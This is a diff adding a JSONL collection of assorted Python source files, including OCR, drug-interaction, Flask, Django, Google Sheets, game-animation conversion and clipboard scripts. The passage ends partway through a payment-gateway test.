diff --git "a/433.jsonl" "b/433.jsonl" new file mode 100644--- /dev/null +++ "b/433.jsonl" @@ -0,0 +1,700 @@ +{"seq_id":"138729633","text":"import argparse\r\nimport cv2\r\nfrom pyimagesearch.detector import detect_info\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport sys\r\n\r\n\r\ndef show_img(img):\r\n cv2.imshow('', img)\r\n cv2.waitKey(0)\r\n\r\n\r\ndef plot_img(img):\r\n plt.imshow(img)\r\n plt.show()\r\n\r\n\r\n\r\nimg = cv2.imread(\"./10.jpg\")\r\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n#plot_img(img)\r\n\r\n\r\n\r\n\r\n\r\nface, number_img, name_img, dob_img, gender_img, nation_img, \\\r\ncountry_img, address_img, country_img_list, address_img_list = detect_info(\r\n img)\r\n\r\n\r\n\r\nlist_image = [face, number_img, name_img, dob_img,\r\n gender_img, nation_img, country_img, address_img]\r\nj=0\r\nlist_label=[\"face\", \"number_img\", \"name_img\", \"dob_img\",\"gender_img\", \"nation_img\", \"country_img\", \"address_img\"]\r\nfor i in list_image:\r\n print(list_label[j])\r\n j=j+1\r\n show_img(i)\r\n\r\n\r\n","sub_path":"IDCard Detector and Recognition/OCR-fake.py","file_name":"OCR-fake.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"137211975","text":"import os\nimport json\nfrom pandas.core.frame import DataFrame\n\ndrugs_ddi_path = '/data/DrugData/Drugs/data/'\nwarfarin_path = drugs_ddi_path + 'Warfarin/Warfarin_inter.json'\n\nddi_list = []\nddi_list_check = []\ndrug_list = []\n\nwith open(warfarin_path,'r') as load_f:\n warfarin_dict = json.load(load_f)\n\ninter_list = warfarin_dict['Drug Interactions']['inter_list']\nfor i in inter_list:\n drug_list.append(i[1])\n ddi_list.append(['warfarin', i[1], i[0]])\n \ng = os.walk(drugs_ddi_path) \nfor path,dir_list,file_list in g: \n for dir_name in dir_list:\n if(dir_name.lower() in drug_list):\n drug_ddi_file = os.path.join(path, dir_name) + '/' + dir_name + '_inter.json'\n try:\n with open(drug_ddi_file,'r') as load_drug:\n drug_dict = json.load(load_drug) \n for i in drug_dict['Drug Interactions']['inter_list']:\n if(i[1] in drug_list):\n new_list = [dir_name.lower(), i[1]]\n new_list.sort()\n \n if(new_list in ddi_list_check):\n continue\n else:\n ddi_list_check.append(new_list)\n ddi_list.append([dir_name.lower(), i[1], i[0]]) \n \n except FileNotFoundError:\n pass\n\ndata = DataFrame(ddi_list)\ndata.to_csv(\"warfarin_ddi.csv\")\n\ndrug_dict = {}\ndrug_dict['warfarin'] = 0\nfor i in range(0,len(drug_list)):\n drug_dict[drug_list[i]] = i\n\nnew_drug_list = []\nnew_drug_list.append('warfarin')\nfor i in drug_list:\n new_drug_list.append(i)\npd1_list = []\npd2_list = []\nfor i in ddi_list:\n pd1_list.append([drug_dict[i[0]], drug_dict[i[1]], i[2]])\nlabel_list = []\nlabel_list.append(1)\nfor i in drug_list:\n label_list.append(0)\nfor i in range(0,len(new_drug_list)):\n pd2_list.append([new_drug_list[i], label_list[i], label_list[i]])","sub_path":"warfarin-demo/warfarin-demo.py","file_name":"warfarin-demo.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"7804849","text":"# type: ignore\n# silence mypy for the routes file\nimport os\nimport urllib.parse\nfrom typing import Any\n\nfrom flask import (\n Blueprint,\n abort,\n current_app,\n jsonify,\n redirect,\n request,\n send_from_directory,\n)\n\nfrom application import cache\nfrom application.database import db\nfrom application.defs import cre_defs as defs\n\nITEMS_PER_PAGE = 20\n\napp = Blueprint(\"web\", __name__, static_folder=\"../frontend/www\")\n\n\ndef extend_cre_with_tag_links(\n cre: defs.CRE, collection: db.Standard_collection\n) -> defs.CRE:\n others = []\n # for each tag: get by tag, append results as \"RELATED TO\" links\n for tag in cre.tags:\n others.extend(collection.get_by_tags([tag]))\n others = list(frozenset(others))\n for o in others:\n o.links = []\n cre.add_link(defs.Link(ltype=defs.LinkTypes.Related, document=o))\n return cre\n\n\n@app.route(\"/rest/v1/id/\", methods=[\"GET\"])\n@cache.cached(timeout=50)\ndef find_by_id(creid: str) -> Any: # refer\n\n database = db.Standard_collection()\n include_only = request.args.getlist(\"include_only\")\n cre = database.get_CREs(external_id=creid, include_only=include_only)[0]\n\n if cre:\n # disable until we have a consensus on tag behaviour\n # cre = extend_cre_with_tag_links(cre=cre, collection=database)\n return jsonify({\"data\": cre.todict()})\n abort(404)\n\n\n@app.route(\"/rest/v1/name/\", methods=[\"GET\"])\n@cache.cached(timeout=50)\ndef find_by_name(crename: str) -> Any:\n\n database = db.Standard_collection()\n cre = database.get_CREs(name=crename)[0]\n if cre:\n cre = extend_cre_with_tag_links(cre=cre, collection=database)\n return jsonify(cre.todict())\n abort(404)\n\n\n@app.route(\"/rest/v1/standard/\", methods=[\"GET\"])\n# @cache.cached(timeout=50)\ndef find_standard_by_name(sname: str) -> Any:\n database = db.Standard_collection()\n opt_section = request.args.get(\"section\")\n if opt_section:\n opt_section = urllib.parse.unquote(opt_section)\n opt_subsection = request.args.get(\"subsection\")\n opt_hyperlink = request.args.get(\"hyperlink\")\n page = 1\n if request.args.get(\"page\") is not None and int(request.args.get(\"page\")) > 0:\n page = request.args.get(\"page\")\n items_per_page = request.args.get(\"items_per_page\") or ITEMS_PER_PAGE\n\n include_only = request.args.getlist(\"include_only\")\n\n total_pages, standards, _ = database.get_standards_with_pagination(\n name=sname,\n section=opt_section,\n subsection=opt_subsection,\n link=opt_hyperlink,\n page=int(page),\n items_per_page=int(items_per_page),\n include_only=include_only,\n )\n result = {}\n result[\"total_pages\"] = total_pages\n result[\"page\"] = page\n if standards:\n res = [stand.todict() for stand in standards]\n result[\"standards\"] = res\n return jsonify(result)\n abort(404)\n\n\n# TODO: (spyros) paginate\n@app.route(\"/rest/v1/tags\", methods=[\"GET\"])\n@cache.cached(timeout=50)\ndef find_document_by_tag(sname: str) -> Any:\n database = db.Standard_collection()\n tags = request.args.getlist(\"tag\")\n documents = database.get_by_tags(tags)\n if documents:\n res = [doc.todict() for doc in documents]\n return jsonify(res)\n\n\n@app.route(\"/rest/v1/gap_analysis\", methods=[\"GET\"])\n@cache.cached(timeout=50)\ndef gap_analysis() -> Any: # TODO (spyros): add export result to spreadsheet\n database = db.Standard_collection()\n standards = request.args.getlist(\"standard\")\n documents = database.gap_analysis(standards=standards)\n if documents:\n res = [doc.todict() for doc in documents]\n return jsonify(res)\n\n\n@app.route(\"/rest/v1/text_search\", methods=[\"GET\"])\n# @cache.cached(timeout=50)\ndef text_search() -> Any:\n \"\"\"\n Performs arbitrary text search among all known documents.\n Formats supported:\n * 'CRE:' will search for the in cre ids\n * 'CRE:' will search for the in cre names\n * 'Standard:[:
:subsection]' will search for\n all entries of and optionally, section/subsection\n * '\\d\\d\\d-\\d\\d\\d' (two sets of 3 digits) will first try to match\n CRE ids before it performs a free text search\n Anything else will be a case insensitive LIKE query in the database\n \"\"\"\n database = db.Standard_collection()\n text = request.args.get(\"text\")\n documents = database.text_search(text)\n if documents:\n res = [doc.todict() for doc in documents]\n return jsonify(res)\n else:\n abort(404)\n\n\n@app.errorhandler(404)\ndef page_not_found(e) -> Any:\n # Even though Flask logs it by default,\n # I prefer to have a logger dedicated to 404\n return \"Resource Not found\", 404\n\n\n# If no other routes are matched, serve the react app, or any other static files (like bundle.js)\n@app.route(\"/\", defaults={\"path\": \"\"})\n@app.route(\"/\")\n# @cache.cached(timeout=50)\ndef index(path: str) -> Any:\n if path != \"\" and os.path.exists(app.static_folder + \"/\" + path):\n return send_from_directory(app.static_folder, path)\n else:\n return send_from_directory(app.static_folder, \"index.html\")\n\n\n@app.before_request\ndef before_request():\n if current_app.config[\"ENVIRONMENT\"] != \"PRODUCTION\":\n return\n\n if not request.is_secure:\n print(\"https redir\")\n url = request.url.replace(\"http://\", \"https://\", 1)\n code = 301\n return redirect(url, code=code)\n\n\n@app.after_request\ndef add_header(response):\n response.cache_control.max_age = 300\n return response\n\n\nif __name__ == \"__main__\":\n app.run(use_reloader=False, debug=False)\n","sub_path":"application/web/web_main.py","file_name":"web_main.py","file_ext":"py","file_size_in_byte":5699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"97425703","text":"from pprint import pprint\n\nimport httplib2\nimport apiclient.discovery\nfrom oauth2client.service_account import ServiceAccountCredentials\n\n\n# Файл, полученный в Google Developer Console\nCREDENTIALS_FILE = 'creds.json'\n# ID Google Sheets документа (можно взять из его URL)\nspreadsheet_id = '1JdPwwwaUnqv2WYVVn9DQeFIu017zWHh7Go5dMQvLEek'\n\n# Авторизуемся и получаем service — экземпляр доступа к API\ncredentials = ServiceAccountCredentials.from_json_keyfile_name(\n CREDENTIALS_FILE,\n ['https://www.googleapis.com/auth/spreadsheets',\n 'https://www.googleapis.com/auth/drive'])\nhttpAuth = credentials.authorize(httplib2.Http())\nservice = apiclient.discovery.build('sheets', 'v4', http = httpAuth)\n\n\n\n# Пример чтения файла\nvalues = service.spreadsheets().values().get(\n spreadsheetId=spreadsheet_id,\n range='ЛИСТ1',\n majorDimension='COLUMNS'\n).execute()\npprint(values)\ncell_list = values['values']\nprint(cell_list)\ncells = cell_list[0]\nprint(cells)\ncell = len(cells)\nprint(cell)\n\ndef sheet_write(data):\n values = service.spreadsheets().values().batchUpdate(\n spreadsheetId=spreadsheet_id,\n body={\n \"valueInputOption\": \"USER_ENTERED\",\n \"data\": [\n {\"range\": \"ЛИСТ1!A\"+str(cell+1),\n \"majorDimension\": \"ROWS\",\n \"values\": [[data[0], data[1],data[2],data[3],data[4],data[5],data[6],data[7],data[8],data[8]]]}\n ]\n }\n ).execute()\n return","sub_path":"func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"414139927","text":"# Copyright 2015 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nimport errno\nimport imp\nimport os.path\nimport sys\n\n\ndef _GetDirAbove(dirname):\n \"\"\"Returns the directory \"above\" this file containing |dirname| (which must\n also be \"above\" this file).\"\"\"\n path = os.path.abspath(__file__)\n while True:\n path, tail = os.path.split(path)\n assert tail\n if tail == dirname:\n return path\n\n\ndef EnsureDirectoryExists(path, always_try_to_create=False):\n \"\"\"A wrapper for os.makedirs that does not error if the directory already\n exists. A different process could be racing to create this directory.\"\"\"\n\n if not os.path.exists(path) or always_try_to_create:\n try:\n os.makedirs(path)\n except OSError as e:\n # There may have been a race to create this directory.\n if e.errno != errno.EEXIST:\n raise\n\n\ndef EnsureModuleAvailable(module_name):\n \"\"\"Helper function which attempts to find the Python module named\n |module_name| using the usual module search. If that fails, this assumes it's\n being called within the Chromium tree, or an equivalent tree where this\n library lives somewhere under a \"mojo\" directory which has a \"third_party\"\n sibling.\"\"\"\n try:\n imp.find_module(module_name)\n except ImportError:\n sys.path.append(os.path.join(_GetDirAbove(\"mojo\"), \"third_party\"))\n","sub_path":"mojo/public/tools/mojom/mojom/fileutil.py","file_name":"fileutil.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"283327423","text":"#!/usr/bin/python\n# author: Jan Hybs\n\n\nimport os\n\n\nclass ProjectStepGit(object):\n \"\"\"\n Simple class holding git specification\n \"\"\"\n def __init__(self, **kwargs):\n self.url = kwargs['url']\n self.repo = str(os.path.basename(self.url).split('.')[0])\n self.remove_before_checkout = kwargs.get('remove-before-checkout', False)\n self.branch = kwargs.get('branch', 'master')\n self.commit = kwargs.get('commit', '')","sub_path":"ci-hpc/structures/project_step_git.py","file_name":"project_step_git.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"114883914","text":"#!/usr/bin/env python3\n\nimport requests\n\n# download current go.obo file\ngo_obo_url = 'http://current.geneontology.org/ontology/go.obo'\n\nreq = requests.get(go_obo_url, stream=True, verify=False)\nhandle = open('./data/go.obo', 'wb')\n\nfor chunk in req.iter_content(chunk=512):\n if chunk:\n handle.write(chunk)\nhandle.close()\n\n","sub_path":"get_gene_ontology_data.py","file_name":"get_gene_ontology_data.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"370318074","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.contrib.auth.models import User\nfrom django.core.validators import RegexValidator\nfrom django.utils.translation import ugettext as _\n\nfrom django.db import models\n\nphone_regex = RegexValidator(\n regex=r'^\\+?1?\\d{9,15}$',\n message=_(\n u'Номер телефона должен быть введен в формате: «+999999999». '\n u'Допускается до 15 цифр.'\n )\n)\n\n\nclass PositionEnum(object):\n \"\"\"\n Коллекция должностей\n \"\"\"\n ADMINISTRATOR, ANALYST, AUDITOR, AUCTIONEER, STOCKBROKER = range(0, 5)\n TRADER, ACCOUNTANT, ACCOUNTANT_AUDITOR, DEALER, DISPATCHER = range(5, 10)\n DERMATOLOGIST, ENGINEER, BROKER = range(11, 14)\n\n values = {\n ADMINISTRATOR: _(u'Администратор'),\n ANALYST: _(u'Аналитик'),\n AUDITOR: _(u'Аудитор'),\n AUCTIONEER: _(u'Аукционист'),\n STOCKBROKER: _('Биржевой маклер'),\n TRADER: _('Биржевик'),\n ACCOUNTANT: _(u'Бухгалтер'),\n ACCOUNTANT_AUDITOR: _(u'Бухгалтер-аудитор'),\n DEALER: _(u'Дилер'),\n DISPATCHER: _(u'Диспетчер'),\n DERMATOLOGIST: _(u'Документовед'),\n ENGINEER: _(u'Инженер'),\n BROKER: _('Брокер'),\n }\n\n\nclass Department(models.Model):\n u\"\"\"\n Модель отделов\n \"\"\"\n code = models.CharField(max_length=30, null=True, blank=True)\n name = models.CharField(max_length=30, null=True, blank=True)\n\n def __unicode__(self):\n return self.name\n\n\nclass Employees(User):\n u\"\"\"\n Модель сотрудников\n \"\"\"\n\n patronymic = models.CharField(\n _(u'Отчество'), max_length=30, null=True, blank=True\n )\n date_birth = models.DateField(_(u'Дата рождения'))\n employment_date = models.DateField(\n _(u'Дата приема на рабоу'), blank=True, null=True\n )\n date_of_dismissal = models.DateField(\n _(u'Дата увольнения'), blank=True, null=True\n )\n\n phone_number = models.CharField(\n max_length=15, validators=[phone_regex], blank=True\n )\n department = models.ForeignKey(\n Department, verbose_name=_(u'отдел'), null=True,\n blank=True, db_index=True\n )\n position = models.SmallIntegerField(\n choices=PositionEnum.values.items()\n )\n\n @property\n def fullname(self):\n return u' '.join(\n [\n self.last_name or u'',\n self.first_name or u'',\n self.patronymic or u''\n ]\n )\n\n @property\n def position_display(self):\n return PositionEnum.values.get(self.position, None)\n\n User._meta.get_field('first_name').verbose_name = _(u'Имя')\n User._meta.get_field('last_name').verbose_name = _(u'Фамилия')\n User._meta.get_field('is_staff').help_text = _(\n 'Указывыет может ли полльзователь регистрироваться '\n 'на административном ресурсе'\n )\n User._meta.get_field('is_active').help_text = _(\n 'Указывыет является ли учетная запись действущей'\n )\n","sub_path":"employees/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"549713898","text":"\nfrase = 'PrOgRaMaMoS em python!'\n\ndef maiusculas(frase):\n i = 0\n a = 0\n m = ''\n\n for x in frase:\n #print(texto[i])\n if frase[i].isupper():\n m = m + frase[i]\n i = i + 1\n\n return(m)\n","sub_path":"maiusculas.py","file_name":"maiusculas.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"311220342","text":"import os\nimport re\nimport unittest\nimport xml.etree.ElementTree as ET\n\nclass RynnConverter(object):\n\n bones = None\n animations = None\n name = None\n\n def __init__(self, drakan_model_path):\n self.bones = []\n self.set_bones(drakan_model_path)\n\n def set_bones(self, file):\n with open(file) as inp:\n nodes = False\n\n for line in inp:\n line = line.strip()\n if 'nodes [' in line:\n nodes = True\n if nodes and ']' == line:\n return\n if nodes:\n name = re.search('(\\\\d+)\\s+name=\"(.+?)\"', line)\n if name:\n print('Found Node %s named %s' % (name.groups()[0], name.groups(1)))\n # self.bones[] =\n self.bones.insert(int(name.groups()[0]), name.groups()[1])\n\n def get_animations(self, path_to_file, name):\n self.name = name\n\n animations = []\n if not os.path.isfile(path_to_file):\n raise IOError('not a file %s' % path_to_file)\n\n with open(path_to_file) as in_file:\n current_bone = None\n for line in in_file:\n if line.count('Node') > 0:\n number = re.search('Node (\\\\d+)', line)\n if number:\n current_bone = self.BoneAnimation(self.bones[int(number.groups()[0])])\n print('Bone %s' % current_bone.name)\n animations.append(current_bone)\n else:\n data = re.findall('(-?\\\\d+\\\\.\\\\d+)', line)\n if data and current_bone:\n current_bone.timestamps.append(data[0])\n an = []\n an.append(data[1])\n an.append(data[4])\n an.append(data[7])\n an.append(data[10] + \"\\n\")\n an.append(data[2])\n an.append(data[5])\n an.append(data[8])\n an.append(data[11] + \"\\n\")\n an.append(data[3])\n an.append(data[6])\n an.append(data[9])\n an.append(data[12] + \"\\n\")\n\n #=======================\n\n an = an + ['0', '0', '0', '1']\n\n current_bone.animations.append(an)\n\n self.animations = animations\n\n\n\n class BoneAnimation(object):\n\n timestamps = None\n animations = None\n name = None\n\n def __init__(self, name):\n self.timestamps = []\n self.animations = []\n self.name = name\n\nclass TestRynn(unittest.TestCase):\n\n def setUp(self):\n self.Rynn = RynnConverter(r'C:\\Games\\Drakan_ed\\Psygnosis\\Drakan\\Drakan Dump\\Common\\System' +\n r'\\System [root]\\Rynn\\Singleplayer\\Model3713 leather armor(h).txt')\n\n def test_wrynn(self):\n self.assertEquals(self.Rynn.bones[0], 'wrynn')\n\n def test_upperbody(self):\n self.assertEquals(self.Rynn.bones[1], 'upperbody')\n\n def test_lowerbody(self):\n self.assertEquals(self.Rynn.bones[20], 'lowerbody')\n\n def test_Ltoe(self):\n self.assertEquals(self.Rynn.bones[31], 'Ltoe')\n\n def test_Lsheath(self):\n self.assertEquals(self.Rynn.bones[32], 'Lsheath')\n\n def test_len(self):\n self.assertEquals(len(self.Rynn.bones), 33)\n\n\ndef indent(elem, level=0):\n i = \"\\n\" + level*\" \"\n if len(elem):\n if not elem.text or not elem.text.strip():\n elem.text = i + \" \"\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n for elem in elem:\n indent(elem, level+1)\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n else:\n if level and (not elem.tail or not elem.tail.strip()):\n elem.tail = i\n\ndef create_animation_tag(animation_clip_name, animation):\n \"\"\"\n Create tag for a single track\n :param animation_clip_name: name for animation (which can comprise multiple tracks)\n :param animation: BoneAnimation object\n :return:\n \"\"\"\n fullname = animation_clip_name + '_' + animation.name\n animation_tag = ET.Element('animation')\n animation_tag.set('id', fullname)\n source_input = ET.SubElement(animation_tag, 'source')\n source_input.set('id', fullname + '-input')\n source_output = ET.SubElement(animation_tag, 'source')\n source_output.set('id', fullname + '-output')\n source_interpolation = ET.SubElement(animation_tag, 'source')\n source_interpolation.set('id', fullname + '-interpolation')\n sampler = ET.SubElement(animation_tag, 'sampler')\n sampler.set('id', fullname + '-sampler')\n channel = ET.SubElement(animation_tag, 'channel')\n channel.set('source', '#' + sampler.get('id'))\n channel.set('target', 'Armature_%s/transform' % animation.name)\n\n input_array = ET.SubElement(source_input, 'float_array')\n input_array.set('id', fullname + '-input-array')\n input_array.set('count', str(len(animation.timestamps)))\n input_array.text = '\\n' + '\\n'.join(animation.timestamps) + '\\n'\n\n input_technique_common = ET.SubElement(source_input, 'technique_common')\n input_accessor = ET.SubElement(input_technique_common, 'accessor')\n input_accessor.set('source', '#' + input_array.get('id'))\n input_accessor.set('count', str(len(animation.timestamps)))\n input_accessor.set('stride', '1')\n\n input_accessor_param = ET.SubElement(input_accessor, 'param')\n input_accessor_param.set('name', 'TIME')\n input_accessor_param.set('type', 'float')\n\n output_array = ET.SubElement(source_output, 'float_array')\n output_array.set('id', fullname + '-output-array')\n output_array.set('count', str(len(animation.timestamps) * 16))\n output_array.text = '\\n'\n for an in animation.animations:\n output_array.text += ' '.join(an) + '\\n'\n\n output_technique_common = ET.SubElement(source_output, 'technique_common')\n output_accessor = ET.SubElement(output_technique_common, 'accessor')\n output_accessor.set('source', '#' + output_array.get('id'))\n output_accessor.set('count', str(len(animation.timestamps) * 16))\n output_accessor.set('stride', '16')\n\n output_accessor_param = ET.SubElement(output_accessor, 'param')\n output_accessor_param.set('name', 'TRANSFORM')\n output_accessor_param.set('type', 'float4x4')\n\n interpolation_array = ET.SubElement(source_interpolation, 'Name_array')\n interpolation_array.set('id', source_interpolation.get('id') + '-array')\n interpolation_array.set('count', str(len(animation.timestamps)))\n nametext = 'LINEAR ' * len(animation.timestamps) # WORNG ELEMENTS NUMER IS PRINTED. NOT COUNT, TEXT!\n interpolation_array.text = '\\n' + '\\n'.join(nametext.split(' '))\n\n interpolation_technique_common = ET.SubElement(source_interpolation, 'technique_common')\n interpolation_accessor = ET.SubElement(interpolation_technique_common, 'accessor')\n interpolation_accessor.set('source', '#' + interpolation_array.get('id'))\n interpolation_accessor.set('count', str(len(animation.timestamps)))\n interpolation_accessor.set('stride', '1')\n\n interpolation_accessor_param = ET.SubElement(interpolation_accessor, 'param')\n interpolation_accessor_param.set('name', 'INTERPOLATION')\n interpolation_accessor_param.set('type', 'name')\n\n sampler_input = ET.SubElement(sampler, 'input')\n sampler_input.set('semantic', 'INPUT')\n sampler_input.set('source', '#' + source_input.get('id'))\n sampler_output = ET.SubElement(sampler, 'input')\n sampler_output.set('semantic', 'OUTPUT')\n sampler_output.set('source', '#' + source_output.get('id'))\n sampler_interpolation = ET.SubElement(sampler, 'input')\n sampler_interpolation.set('semantic', 'INTERPOLATION')\n sampler_interpolation.set('source', '#' + source_interpolation.get('id'))\n\n indent(animation_tag)\n return fullname, animation_tag\n\n\ndef create_animation_clip(name, tracks, start=0, end=0.0):\n \"\"\"\n Generate tags for each track for \n and an for \n :param name: name of animation clip (will be used in animations names)\n :param tracks: list with BoneAnimation objects\n :param start: (double) start time in seconds. 0 by default\n :param end: (double) stop time in seconds. 0 by default. If not specified, the longest track last timestamp will be taken\n :return: elementTree , ElementTree [] list\n \"\"\"\n animation_tags = []\n\n clip_tag = ET.Element('{http://www.collada.org/2005/11/COLLADASchema}animation_clip')\n clip_tag.set('id', name)\n clip_tag.set('name', name)\n\n\n for anim in tracks:\n an_name, an_tag = create_animation_tag(name, anim)\n animation_tags.append(an_tag)\n # print(ET.tostring(an_tag))\n\n instance = ET.SubElement(clip_tag, '{http://www.collada.org/2005/11/COLLADASchema}instance_animation')\n instance.set('url', \"#\" + an_name)\n\n animation_length = float(anim.timestamps[-1])\n if animation_length > end:\n if end == 0.0:\n end = animation_length\n else:\n raise ValueError('Found a track with last timestamp %s for %s track larger then stop provided %s' %\n (animation_length, anim.name, end))\n\n clip_tag.set('start', str(start))\n clip_tag.set('end', str(end))\n indent(clip_tag)\n print(ET.tostring(clip_tag))\n return clip_tag, animation_tags\n\n\ndef add_animations_to_file(input_file, output_file, animation_tags, animation_clip_tag,\n clear_animations=True, clear_clips = False):\n # Open original file\n ET.register_namespace('', \"http://www.collada.org/2005/11/COLLADASchema\")\n et = ET.parse(input_file)\n root = et.getroot()\n library_animations = root.findall(\"{http://www.collada.org/2005/11/COLLADASchema}library_animations\")\n\n if not library_animations:\n library_animations = ET.SubElement(root, '{http://www.collada.org/2005/11/COLLADASchema}library_animations')\n else:\n library_animations = library_animations[0]\n\n library_animation_clips = root.findall(\"{http://www.collada.org/2005/11/COLLADASchema}library_animation_clips\")\n\n if not library_animation_clips:\n library_animation_clips = ET.SubElement(root, '{http://www.collada.org/2005/11/COLLADASchema}library_animation_clips')\n else:\n library_animation_clips = library_animation_clips[0]\n\n library_animation_clips.append(animation_clip_tag)\n indent(library_animation_clips)\n\n for tag in animation_tags:\n library_animations.append(tag)\n indent(library_animations)\n # Write back to file\n\n et.write(output_file, encoding='utf-8', xml_declaration=True)\n # et.write(output_file, xml_declaration=True)\n\n\nif __name__ == '__main__':\n conv = RynnConverter(r'C:\\Games\\Drakan_ed\\Psygnosis\\Drakan\\Drakan Dump\\Common\\System' +\n r'\\System [root]\\Rynn\\Singleplayer\\Model3713 leather armor(h).txt')\n # drakan_animation_file = r'C:\\Games\\Drakan_ed\\Psygnosis\\Drakan\\Drakan Dump\\Common\\System\\System [root]\\Animations\\Anim470 balance.txt'\n # drakan_animation_file = r'C:\\Games\\Drakan_ed\\Psygnosis\\Drakan\\Drakan Dump\\Common\\System\\System [root]\\Animations\\Anim649 runeblade.txt'\n drakan_animation_file = r'C:\\Games\\Drakan_ed\\Psygnosis\\Drakan\\Drakan Dump\\Common\\System\\System [root]\\Animations\\Anim675 run1h.txt'\n # drakan_animation_file = r'C:\\Games\\Drakan_ed\\Psygnosis\\Drakan\\Drakan Dump\\Common\\System\\System [root]\\Animations\\Anim560 ride.txt'\n name = 'RUN'\n output_file = 'tmp'\n # input_dae_file = r\"C:\\GoDot\\Projects\\GoDrak\\Models\\Player_leather\\leather_animatied.dae\"\n input_dae_file = r\"C:\\GoDot\\Projects\\GoDrak\\Models\\Player_leather\\leather.dae\"\n output_dae_file = r\"C:\\GoDot\\Projects\\GoDrak\\Models\\Player_leather\\leather_animatied.dae\"\n\n conv.get_animations(drakan_animation_file, name)\n clip_tag, animation_tags = create_animation_clip(conv.name, conv.animations)\n\n add_animations_to_file(input_dae_file, output_dae_file, animation_tags, clip_tag)\n\n\n\n\n\n","sub_path":"Tools/Amination_converter.py","file_name":"Amination_converter.py","file_ext":"py","file_size_in_byte":12330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"49739367","text":"# 介绍:将剪切板内容保存到shelve中,实现多重剪切板\n# 使用: • 针对要检查的关键字,提供命令行参数。\n# • 如果参数是 save,那么将剪贴板的内容保存到关键字。python mcb.py save \n# • 如果参数是 list,就将所有的关键字拷贝到剪贴板。\n# • 否则,就将关键词对应的文本拷贝到剪贴板。\n\nimport sys, shelve, pyperclip\n\nmcbShelf = shelve.open('mcb')\n# 保存剪切板内容\nif len(sys.argv) == 3 and sys.argv[1].lower() == 'save':\n mcbShelf[sys.argv[2]] = pyperclip.paste()\n print('已保存')\n# 列出剪切板内容\nelif len(sys.argv) == 2:\n if sys.argv[1].lower() == 'list':\n print('所有的列表:')\n print(str(list(mcbShelf.keys())))\n elif sys.argv[1] in mcbShelf:\n pyperclip.copy(str(mcbShelf[sys.argv[1]]))\n print('已复制' + sys.argv[1] + '到剪切板')\n print('内容为:')\n print(str(mcbShelf[sys.argv[1]]))\n\nmcbShelf.close()","sub_path":"code/mcb.py","file_name":"mcb.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"174235420","text":"import matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.pylab import *\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport numpy as np\nfrom scipy.optimize import curve_fit\n\n#%matplotlib inline\nproc = [1,2,4]\nmode = [1,2,3]\n\ntime1 = loadtxt(str(\"time1.dat\"), unpack = True)\ntime2 = loadtxt(str(\"time2.dat\"), unpack = True)\ntime4 = loadtxt(str(\"time4.dat\"), unpack = True)\n\ntimes=[time1,time2,time4]\nfig2 = plt.figure(figsize=(7,7))\nax2 = plt.gca()\nplt.plot(proc,times,'o',markersize=10,color = (1,1,0))\nplt.title('No. Proc. vs. time')\nplt.xlabel('# proc.')\nplt.xlim(0,5)\nplt.ylim(np.min(times)-5,np.max(times)+5)\nplt.grid(True)\nplt.ylabel('time [s]')\nplt.savefig('Nvst.pdf')\n\ndata=[1,2,4]\n\nfor i in data:\n filename=\"data\"+str(i)+\".dat\"\n time, e1, e2, e3 = np.loadtxt(str(filename), unpack = True)\n fig = plt.figure()\n ax = plt.gca()\n plt.plot(time,e1,'*',color = (1,1,0),label='mode: 1')\n plt.plot(time,e2,'x',color = (0,1,1),label='mode: 2')\n plt.plot(time,e3,'+',color = (1,0,1),label='mode: 3')\n plt.legend() \n plt.title('Energy Evolution')\n plt.xlabel('Steps on time')\n plt.ylabel('Energy')\n plt.grid(True)\n plt.savefig('Energy_nproc'+str(i)+'.pdf')\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"189376132","text":"from faker import Factory\nfrom hamcrest import assert_that, instance_of, equal_to\n\nfrom data.xml_requests import securecard_registration, payment_securecard, payment_avs\nfrom model.gateway import PAYMENTRESPONSE, SECURECARDREGISTRATIONRESPONSE, REFUNDRESPONSE\nfrom wnclient import WNClient\n\nfake = Factory.create()\n\nwn = WNClient().hound.go\nTERM_ID = '352008'\n\n\ndef test_paysafe_securecard_payment_ok():\n securecard = securecard_registration()\n\n sc_response = wn.xml(TERM_ID).secure_card_registration(securecard)\n assert_that(sc_response, instance_of(SECURECARDREGISTRATIONRESPONSE))\n\n p = payment_securecard(cardreference=sc_response.CARDREFERENCE)\n response = wn.xml(TERM_ID).payment(p)\n assert_that(response, 